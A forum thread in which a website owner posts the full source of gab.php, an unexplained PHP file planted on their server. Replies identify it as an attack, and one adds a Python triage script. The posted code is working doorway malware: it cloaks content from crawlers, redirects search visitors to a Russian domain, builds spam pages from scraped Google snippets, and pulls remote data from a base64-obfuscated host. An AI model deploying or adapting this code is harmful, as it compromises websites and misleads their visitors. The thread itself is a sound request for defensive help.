
Weird file showing up on my website - gab.php

DT4K

Diamond Member
Anyone know what gab.php is?
I was just looking at my site traffic and noticed there are a lot of hits to a file called gab.php. I see the file in my directory, but I have no idea what it is. I know I didn't put it there.
If I navigate to it in IE, I just get text that says "PASSED".

I would think maybe it's something my host company put in place, but the fact that there is a variable in it with a russian domain makes me wonder.

Here are the contents of the file. Anyone know anything about this?

PHP:
<?php
error_reporting(0);
set_time_limit(0);
ignore_user_abort();    

$domain = "s4gvhd35.ru";
$main_nishe = "weather";

$ref = $_SERVER['HTTP_REFERER']; $host = $_SERVER["HTTP_HOST"]; $content_num = 100; $content_num_p = 100; $dhost = $_SERVER['HTTP_HOST'];

$dirbi = "blog";
if(!is_dir($dirbi)){
@mkdir($dirbi);
@chmod($dirbi, 0777);
}

if(!file_exists("logs2.txt")){ 
    $nish_f = $main_nishe."-".rand(0,9); 
    $url = explode("\n",GetPage("http://".returnIT()."/grab/wnish/".$nish_f.".txt"));
    shuffle($url);
    $fwr = ''; 
    for($i=0;$i<1000;$i++){ 
        $kkw = ltrim(rtrim(trim($url[$i])));
        if(strpos($kkw, "'")===false) $fwr .= $kkw."\n"; 
    }

    $fp = fopen("logs2.txt","w"); fwrite($fp, $fwr); fclose($fp); 
}

if(!file_exists("logs3.txt")){ 
    $url = explode("\n",GetPage("http://".returnIT()."/grab/wnish/c".$main_nishe.".txt"));
    shuffle($url);
    $fwr = ''; 
    for($i=0;$i<50;$i++){ 
        $fwr .= ltrim(rtrim(trim($url[$i])))."\n"; 
    }

    $fp = fopen("logs3.txt","w"); fwrite($fp, $fwr); fclose($fp); 
}


if(IsRefSE()==true&&IsBot()==false) {header("Location: http://".$domain."/liq/"."?st=".($_SERVER['HTTP_HOST']));exit;}
$ex = explode("=",$_SERVER['QUERY_STRING']); $var = $ex[0]; $query = str_replace("-"," ",$_GET[$var]);
$furl = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']."?".$var."=";

if(!$_GET[$var]) exit("PASSED");
$xmlUrl = $dirbi."/".md5($_GET[$var]).".txt"; 

$xmlStr = file_get_contents($xmlUrl); $query_d = str_replace(" ","-",$query); $arrXml[$query_d] = untag($xmlStr, $query_d);

if(!$arrXml[$query_d]){ 
if(!file_exists("logs1.txt")){
    $getTPL = GetPage("http://yourutils.info/nish/?".$dhost);
    $fp = fopen("logs1.txt", "w");
    fwrite($fp, $getTPL);
    fclose($fp);
} 
$kwd = file("logs2.txt"); 
if(str_word_count($query) <= 2){
///// category ----
$content = ''; $pagetitle = ucwords($query); $Get = GetContent($query,$content_num); shuffle($Get); 
// act url
shuffle($kwd); $i = 0; foreach($Get as $k=>$value){ $content .= "<a href=\"".$furl.str_replace(" ","-",trim($kwd[$i]))."\"><b>".trim($kwd[$i])."</b></a><br />\n".$value."<br /><br />\n\n"; 
$i++;
}
///// --- category ----
} else {
///// page ----
// ============
$content = ''; $pagetitle = ucwords($query); $Get = GetContent($query,$content_num); shuffle($Get); 
// act url
shuffle($kwd); $i = 0; foreach($Get as $k=>$value){ 
    if(rand(1,3)==3) $content .= "<a href=\"".$furl.str_replace(" ","-",trim($kwd[$i]))."\"><b>".trim($kwd[$i])."</b></a>";
    else $content .= "<b>".trim($kwd[$i])."</b>";

    $content .= "<br />\n".$value."<br /><br />\n\n"; 
$i++;
}
///// page ----
}

$tpl = file_get_contents("logs1.txt"); $outl = str_replace("\$pagetitle", $pagetitle, $tpl);$outl = str_replace("\$content", $content, $outl); $write = $outl;
$write = htmlspecialchars($write);  $fp = fopen($xmlUrl,"a+");  fwrite($fp, "<".$query_d.">\n".$write."\n</".$query_d.">\n");  fclose($fp); 
$write = htmlspecialchars_decode($write); 

} else {  

$write = htmlspecialchars_decode($arrXml[$query_d]); 

} 

print clean(stripslashes($write)); 

function clean($str){
    $str = str_replace("\\", "", $str);
    $str = str_replace("\\", "", $str);
    return $str;
}

function GetContent($q,$num){
    // Scrapes search-result snippets for the query; they become the "content" of the generated page.
    $q=trim(strtolower($q)); 
    $url="http://www.google.com/search?hl=en&safe=off&client=opera&hs=moz&rls=en&q=".urlencode($q)."&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&lr=lang_en&aq=f&aqi=&aql=&oq=&gs_rfai=&num=".$num; 
    $content=GetPage($url);
    preg_match_all("#<div class=\"s\">(.*)<cite>#U", $content, $result_preg);
    $result=$result_preg[1];
    for ($i=0; $i<count($result); $i++) {
        $snippet=trim($result[$i]); 
        $snippet=strip_tags($snippet,array('<em>','<b>'));
        $snippet=str_replace('em>','b>',$snippet);
        if (strpos($snippet,'File Format')==false)
            if (strpos($snippet,'http://')==false) { 
                $snippet=str_replace("...","",$snippet);
                if (trim($snippet)) $snippets[]=$snippet;
            }
    }
    return $snippets;
}

function GetPage($url){
    // Minimal raw-socket HTTP/1.1 client (with chunked-encoding support) used for every outbound fetch.
    $url=str_replace("http://", "", $url); 
    $host=substr($url,0,strpos($url,"/"));
    $path=substr($url,strpos($url,"/"));
    $skt = @fsockopen($host, 80);
    if (!$skt) return false;
    $requestHeader = "GET ".$path."  HTTP/1.1\r\n"; 
    $requestHeader.= "Host: ".$host."\r\n";
    $requestHeader.= "Connection: close\r\n\r\n";
    fwrite($skt, $requestHeader);
    $responseHeader = "";
    $responseContent = "";
    do {
        $responseHeader.= fread($skt, 1);
    } while (!preg_match("/\\r\\n\\r\\n$/", $responseHeader));
    if (!strstr($responseHeader, "Transfer-Encoding: chunked")){
        while (!feof($skt)) {
            $responseContent.= fgets($skt, 128);
        }
    } else {
        while ($chunk_length = hexdec(fgets($skt))) {
            $responseContentChunk = "";
            $read_length = 0;
            while ($read_length < $chunk_length){
                $responseContentChunk .= fread($skt, $chunk_length - $read_length);
                $read_length = strlen($responseContentChunk);
            }
            $responseContent.= $responseContentChunk;
            fgets($skt);
        }
    }
    return chop($responseContent);
}

function untag($string, $tag) {
    // Pulls the text between <tag> and </tag> out of the cached page file under blog/.
    $ex = explode("<".$tag.">",$string);
    $last = explode("</".$tag.">",$ex[1]);
    return $last[0];
}

function IsBot(){
    // Cloaking check used on the redirect line above: crawlers and direct visitors get the
    // generated page, other visitors with a search-engine-looking referer are redirected to $domain.
    $stop_agents_masks = array("http", "google", "slurp", "msnbot", "bot", "crawler", "spider", "robot", "HttpClient", "curl", "PHP", "Indy Library", "WordPress");
    $_SERVER["HTTP_USER_AGENT"] = preg_replace("|User.Agent\:[\s ]?|i", "", @$_SERVER["HTTP_USER_AGENT"]);
    // As found: $stop_ips_masks is never defined and $stop_agents_masks is never used.
    foreach ($stop_ips_masks as $stop_ip_mask) if(eregi("^{$stop_ip_mask}$", @$_SERVER['REMOTE_ADDR'])) return true; 
    if(substr_count($_SERVER['HTTP_REFERER'],$_SERVER['HTTP_HOST'])!=0) return true;
    if(substr_count($_SERVER['HTTP_REFERER'],'/cse?')!=0) return true; 
    if(substr_count($_SERVER['HTTP_REFERER'],"&")<3)return true;
    if($_SERVER["HTTP_USER_AGENT"]=="Mozilla/4.0 (compatible;)")return true;
    if(($_SERVER['HTTP_REFERER']=='') && ($_SERVER["HTTP_USER_AGENT"]=="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)")) return true;
    return false;
}

function IsRefSE() {
    // Treats any referer carrying three or more "&" parameters as a search-engine results page.
    global $ref;
    if(substr_count($ref,"&")>2) return true; 
    else return false;
}

function returnIT($default = "VFZSbk5FeHFZM2xNYWtsM1RWTTBlRTFVVlQwPQ=="){
    // Triple base64-encoded address of the server the /grab/wnish/ keyword lists above are fetched from.
    return base64_decode(base64_decode(base64_decode($default)));
}
?>
 
I'm with CycloWizard, you really don't need much more than what you have to know it's trouble. If your ISP is inserting scripts that reference Russian domains then I think it is on them to let you know. Otherwise you have to assume it's an attack. If it's a typical site attack that file will be far from the only mischief done, so I would either rebuild or restore from the last good backup. I recently went through this on my Wordpress site because the ISP left the front door open, and the bastards had hooks all over the place in different scripts. It was a pain in the ass.
 
As mark has said, you're in trouble. This looks very suspicious. My guess is that your ISP has been compromised.

This right here

"returnIT($default = "VFZSbk5FeHFZM2xNYWtsM1RWTTBlRTFVVlQwPQ=="){ return base64_decode(base64_decode(base64_decode($default)));"

Looks VERY suspicious. They have a special string that is encoded using base64... twice. Plus a lot of code that attempts to intercept spiders and fool them into thinking the site is valid (i.e., avoid the "malicious webpage" warning you get from Google and Mozilla).
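An added triage helper for anyone who finds a file like this in their web root (my own example, not code from the thread or from gab.php itself). It peels the nested base64 layers of any long quoted literal, so the encoded string called out above decodes to readable text, and it flags the idioms the replies point at: silenced errors plus ignore_user_abort(), the chained base64_decode() calls, the IsBot()-gated Location redirect, and the hard-coded $domain. The embedded SAMPLE_PHP is a constructed, cut-down stand-in for the posted file; the indicator names and regexes are assumptions of this example.

```python
import base64
import binascii
import re

# Constructed sample modelled on the idioms in the posted gab.php; not the full file.
SAMPLE_PHP = r'''<?php
error_reporting(0);
set_time_limit(0);
ignore_user_abort();
$domain = "s4gvhd35.ru";
if(IsRefSE()==true&&IsBot()==false) {header("Location: http://".$domain."/liq/"."?st=".($_SERVER['HTTP_HOST']));exit;}
if(!$_GET[$var]) exit("PASSED");
function returnIT($default = "VFZSbk5FeHFZM2xNYWtsM1RWTTBlRTFVVlQwPQ=="){ return base64_decode(base64_decode(base64_decode($default))); }
?>'''

# Idioms taken from the posted file. Each is weak alone; together they fingerprint this doorway family.
INDICATORS = {
    "errors silenced + ignore_user_abort": re.compile(r"error_reporting\(0\)[\s\S]*?ignore_user_abort\(\)"),
    "nested base64_decode": re.compile(r"(?:base64_decode\(\s*){2,}"),
    "bot-conditional Location redirect": re.compile(r"IsBot\(\)[^\n]*header\(\s*[\"']Location:"),
    "hard-coded redirect $domain": re.compile(r"\$domain\s*=\s*[\"'][^\"']+[\"']"),
}
# Quoted literals long enough to be worth trying as base64.
B64_LITERAL = re.compile(r"[\"']([A-Za-z0-9+/]{16,}={0,2})[\"']")

def peel_base64(blob, max_layers=8):
    """Decode repeatedly while each layer is valid base64 of printable ASCII; return every layer."""
    layers, current = [], blob
    for _ in range(max_layers):
        try:
            decoded = base64.b64decode(current, validate=True)
        except (binascii.Error, ValueError):
            break
        if not decoded or not all(32 <= b < 127 for b in decoded):
            break
        current = decoded.decode("ascii")
        layers.append(current)
    return layers

def triage(php_src):
    """Return the indicator names that matched and, per base64-looking literal, its decoded layers."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(php_src)]
    decoded = {lit: peel_base64(lit) for lit in B64_LITERAL.findall(php_src)}
    decoded = {lit: layers for lit, layers in decoded.items() if layers}
    return {"indicators": hits, "decoded_literals": decoded}

if __name__ == "__main__":
    for key, val in triage(SAMPLE_PHP).items():
        print(key, val)
```

Point `triage()` at the real file contents to see which idioms match and what each encoded literal unwraps to layer by layer.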
 
Anyone know what gab.php is?
I was just looking at my site traffic and noticed there are a lot of hits to a file called gab.php. I see the file in my directory, but I have no idea what it is. I know I didn't put it there.
If I navigate to it in IE, I just get text that says "PASSED".

I would think maybe it's something my host company put in place, but the fact that there is a variable in it with a russian domain makes me wonder.

Here are the contents of the file. Anyone know anything about this?

PHP:
<?php
error_reporting(0);
set_time_limit(0);
ignore_user_abort();    

$domain = "s4gvhd35.ru";

I stopped looking at the source code there.
 